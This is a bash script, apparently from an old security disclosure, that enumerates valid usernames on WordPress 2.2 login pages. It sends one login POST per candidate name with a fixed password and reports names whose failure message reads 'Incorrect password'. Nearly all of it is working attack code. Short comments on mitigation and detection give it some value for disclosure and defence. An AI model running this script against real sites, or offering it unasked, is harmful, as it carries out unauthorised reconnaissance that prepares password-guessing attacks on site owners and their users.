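#!/bin/bash
# Checks a WordPress 2.2 login page for a low-risk username enumeration
# weakness. Previous versions are possibly affected as well.
#
# How the check works: one login POST is sent per candidate name with a fixed
# dummy password; a name is reported when the response body contains
# 'Incorrect password', i.e. when the page's failure text differs for a name
# it recognises.
#
# Defender notes:
#   - Mitigation: have the login form return one identical failure message
#     whether or not the username exists.
#   - Detection: this traffic shows up as a run of POSTs to
#     /wordpress/wp-login.php in which only the log= field changes while the
#     pwd= value stays constant.
#
# Note: you need curl [http://curl.haxx.se/download.html]
# installed on your system for this script to work.
#
# Usage:  $0 <host> <userlist-file>
#   <host>           placed into http://<host>/wordpress/wp-login.php
#   <userlist-file>  candidate usernames, one per line
# Output: each match is printed and appended to "$0.found".
# Exit:   1 on wrong argument count, unreadable list, or missing curl.
#
# Adrian Pastor - http://www.gnucitizen.org/

if [ $# -ne 2 ]; then
  echo "need two parameters! correct syntax is:" >&2
  echo "$0 <host> <userlist-file>" >&2
  exit 1
fi

host=$1
userlist=$2

# Fail early with a clear message instead of letting the loop error out.
if [ ! -r "$userlist" ]; then
  echo "cannot read user list: $userlist" >&2
  exit 1
fi

if ! command -v curl > /dev/null; then
  echo "curl is required but was not found in PATH" >&2
  exit 1
fi

# Read the list line by line: the former `for U in \`cat $2\`` form word-split
# and glob-expanded the file contents. The `|| [ -n "$U" ]` keeps a final line
# that lacks a trailing newline.
while IFS= read -r U || [ -n "$U" ]; do
  # Skip blank lines.
  [ -n "$U" ] || continue

  # curl's stdin is detached so it can never consume the list feeding the loop.
  if curl -s -d "log=$U&pwd=mypassword&wp-submit=Login+%C2%BB&redirect_to=" \
    --url "http://$host/wordpress/wp-login.php" < /dev/null |
    grep -qi 'Incorrect password'; then
    echo "username found!: $U" # print username found on screen
    # Save results to a file named after the script plus a .found extension.
    printf '%s\n' "$U" >> "$0.found"
  fi
done < "$userlist"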